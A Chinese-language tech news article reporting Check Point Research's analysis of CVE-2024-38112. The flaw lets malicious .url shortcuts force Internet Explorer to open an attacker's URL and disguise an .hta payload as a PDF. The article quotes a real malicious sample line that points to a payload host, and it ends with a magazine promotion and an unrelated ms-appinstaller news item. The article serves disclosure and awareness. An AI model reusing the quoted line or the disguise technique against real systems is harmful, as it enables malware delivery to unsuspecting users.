誰能想到,早在 2022 年 6 月 15 日正式退役的 IE 瀏覽器,近日還能因漏洞被推上風口浪尖?
全球網絡安全解決方案提供商 Check Point Research(簡稱為 CPR)最近發現:有攻擊者在過去 18 個月里,通過構建特殊的 Windows Internet 快捷方式文件(即 .url),引誘用戶點擊并調用 IE 瀏覽器來訪問攻擊者控制的 URL,以此進行惡意攻擊。
據了解,這種漏洞甚至可以繞過 Windows 10、Windows 11 系統的安全防護。
強制調用 IE 瀏覽器打開 URL
據悉,該漏洞由 CPR 研究人員發現,追蹤編號為 CVE-2024-38112,微軟方面將其描述為 Windows MSHTML 平臺欺騙漏洞,自 2023 年 1 月以來就一直在被黑客利用:“我們發現的惡意 .url 樣本最早可以追溯到 2023 年 1 月(一年多前),最晚可以追溯到 2024 年 5 月 13 日。這表明,網絡罪犯使用這種攻擊技術已經有一段時間了。”
通過對攻擊過程的詳細分析,CPR 研究人員將該漏洞的實現分解為兩個步驟:
第一步是利用“mhtml”技巧,使得攻擊者可調用已退役的 IE 而非更安全的 Chrome/Edge。
第二步是通過某種 IE 技巧隱藏 .hta 這個擴展名,讓受害者以為他們只是打開了一個 PDF 文件——但實際上,他們正在下載并啟動一個惡意的 .hta 應用程序。
那么接下來,我們就先了解一下這個能在 Windows 中調用 IE 瀏覽器的“mhtml”技巧。
一般情況下,Internet 快捷方式文件(即 .url)是一個文本文件,里面包含各種配置信息,如顯示什么圖標、雙擊時打開什么鏈接等。將其保存為 .url 文件并雙擊后,Windows 會在默認瀏覽器中打開這個 URL。
然而,攻擊者發現可以在 URL 指令中使用 mhtml: URI 處理程序,以此強制用 IE 瀏覽器打開指定的 URL。以下面這個惡意 .url 樣本為例:
可以看到,.url 文件的最后幾行字符串指向 Microsoft Edge 應用程序文件中的一個自定義圖標。乍一看,它似乎指向一個 PDF 文件,但實際上并非如此。CPR 研究人員發現這個關鍵字的值與通常的關鍵字有很大不同:普通 .url 文件的參數類似于 URL=https://www.google.com;但這個惡意樣本的值是 URL=mhtml:http://cbmelipilla.cl/te/test1.html!x-usc:http://cbmelipilla.cl/te/test1.html。
它使用了一個特殊的前綴“mhtml:”。簡單說明一下 MHTML,這是一種“聚合 HTML 文檔的 MIME 封裝”文件,是 IE 瀏覽器中引入的一種存儲文件技術,可將包括圖像在內的整個網頁封裝成一個單一檔案。
CPR 研究人員指出,這樣的惡意 .url 文件在 Windows 11 中會顯示為一個指向 PDF 文件的鏈接:
如果受害者想打開 PDF,雙擊這個 .url 文件,然后便會彈出下面這個來自 IE 瀏覽器的窗口:
沒錯,攻擊者使用 mhtml: URI 啟動 URL 后,Windows 會自動在 IE 瀏覽器中啟動 URL,而不是默認瀏覽器。如文章開頭所說,IE 瀏覽器早在 2022 年就退出歷史舞臺了,在典型的 Windows 10/11 操作系統上,因其安全性不足,用戶一般無法直接用 IE 去訪問網站。
不過有一點需要明確:盡管 IE 已被微軟宣布“退役”,但從技術上講,IE 仍是 Windows 系統的一部分,IE 使用的專有瀏覽器引擎 MSHTML (Trident)也仍包含在操作系統中,微軟計劃至少支持該引擎到 2029 年。
因此,攻擊者使用“mhtml”技巧,讓本意想打開 PDF 的用戶,實際上正在用不安全且過時的 IE 訪問攻擊者控制的網站,尤其在 IE 下載惡意文件時安全警告也相對較少。
打開一個偽裝成 PDF 的惡意 .hta 文件
既然打開的不是 PDF,那受害者通過 IE 打開的到底是什么呢?
根據 IE 瀏覽器的彈出窗口顯示,它要求用戶打開一個名為 .Books_A0UJKO.pdf 的 PDF 文件:
可一旦點擊了這個“Open”(默認選項),緊接著又會跳出另一個窗口:IE 保護模式下的警告提示。
到了這一步,如果用戶一直以為自己打開的不過是個 PDF,大概率會忽略這個警告,那么打開的就會是一個偽裝成 PDF 的惡意 .hta 文件。這是一個從 HTML 文檔中調用的可執行程序,通過一個名為 Microsoft HTML Application Host(mshta.exe)的工具在 Windows 上運行。
CPR 研究人員解釋道:“如果我們仔細觀察 HTTP 流量,就會發現在字符串末尾有許多不可打印的字符——最后是 .hta 字符串,這才是真正的(危險的)擴展名。”
但這個 .hta 字符串被隱藏了:用戶看不到真實的擴展名,所以無防備地繼續點擊文件,根本不知道自己其實正在下載并啟動一個危險的 .hta 應用程序。
一定要警惕從不可信來源發送的 .url 文件
據 CPR 研究人員證實,這個漏洞所用的技巧在 Windows 10/11 操作系統上均可實現。
于是,CPR 方面在 2024 年 5 月 16 日向微軟安全響應中心(MSRC)報告了該漏洞。此后,雙方一直就此事密切合作,終于在 7 月 9 日發布了微軟官方補丁(CVE-2024-38112)。
從通用漏洞評分系統(CVSS)來看,CVE-2024-38112 的評分為 7.5(滿分 10 分),屬于重要漏洞,攻擊者需采取額外行動才能確保成功利用該漏洞。而不論是微軟還是 CPR,都強烈建議 Windows 用戶盡快更新該補丁,因為根據調查顯示該漏洞已被黑客利用一年多了。
最后,CPR 也給出了重要提醒:“對于相關的 Windows 用戶,我們建議一定要警惕從不可信來源發送的 .url 文件,畢竟這種類型的攻擊需要一些用戶交互(如忽略警告彈窗)才能成功。”
參考鏈接:
https://research.checkpoint.com/2024/resurrecting-internet-explorer-threat-actors-using-zero-day-tricks-in-internet-shortcut-file-to-lure-victims-cve-2024-38112/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38112
大模型刷新一切,讓我們有著諸多的迷茫,AI 這股熱潮究竟會推著我們走向何方?面對時不時一夜變天,焦慮感油然而生,開發者怎么能夠更快、更系統地擁抱大模型?《新程序員 007》以「大模型時代,開發者的成長指南」為核心,希望撥開層層迷霧,讓開發者定下心地看到及擁抱未來。
讀過本書的開發者這樣感慨道:“讓我驚喜的是,中國還有這種高質量、貼近開發者的雜志,我感到非常激動。最吸引我的是里面有很多人對 AI 的看法和經驗和一些采訪的內容,這些內容既真實又有價值。”
IT之家 12 月 30 日消息,微軟今天發布安全更新,修復了存在于 Win10、Win11 系統中的“關鍵”漏洞,被攻擊者利用后,可以在用戶機器上安裝惡意軟件。
該漏洞存在于 ms-appinstaller 統一資源標識符(URI)方案中,攻擊者利用該漏洞,可以繞過常規的安全措施,在用戶瀏覽網頁的時候悄悄植入危險軟件。
攻擊者利用 ms-appinstaller 隱藏快捷方式,在受害者 PC 上偷偷安裝惡意軟件。微軟本次補丁已經禁用了這個快捷方式,這意味著從網站下載的任何應用程序都必須像正常下載文件一樣通過安全檢查。
IT之家附上,感興趣的用戶可以深入閱讀。